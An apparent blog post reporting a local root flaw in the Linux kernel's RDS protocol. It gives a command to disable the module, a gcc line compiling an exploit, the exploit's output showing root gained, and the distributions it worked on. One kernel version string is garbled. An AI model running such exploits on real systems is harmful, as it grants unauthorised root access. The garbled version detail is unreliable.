A new security flaw has been discovered in the Linux kernel, especially in Reliable Datagram Sockets protocol (RDS). The exploit allows a single user to become root on a machine. The vulnerability affects Linux distributions based on version 2.6.30 to 2.6.36-rc8 kernel.
To counter this attack, you can either upgrade their system or disable the RDS module using this command:
echo “alias net-pf-21 off” > /etc/modprobe.d/disable-rds
Here is an example of using the exploit:
gcc -o linux-rds-exploit linux-rds-exploit.c
Then execute it like this:
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses…
[+] Resolved rds_proto_ops to 0xf7d2e518
[+] Resolved rds_ioctl to 0xf7d29000
[+] Resolved commit_creds to 0xc0450a6f
[+] Resolved prepare_kernel_cred to 0xc045097a
[*] Overwriting function pointer…
[*] Triggering payload…
[*] Restoring function pointer…
[*] Got root!
uid=0(root) gid=0(root) groups=0(root)
I noticed that the exploit works perfectly on Fedora 13 (Kernel 18.104.22.168-56) and Ubuntu 10.10 (kernel 2.6.35-22-generic-pae). However, it does not work on Red Hat and CentOS, the kernel is currently in version 2.6.18.
Otherwise, once will not hurt, it’s even Linus Torvalds, who took over the problem and proposed a fix very quickly.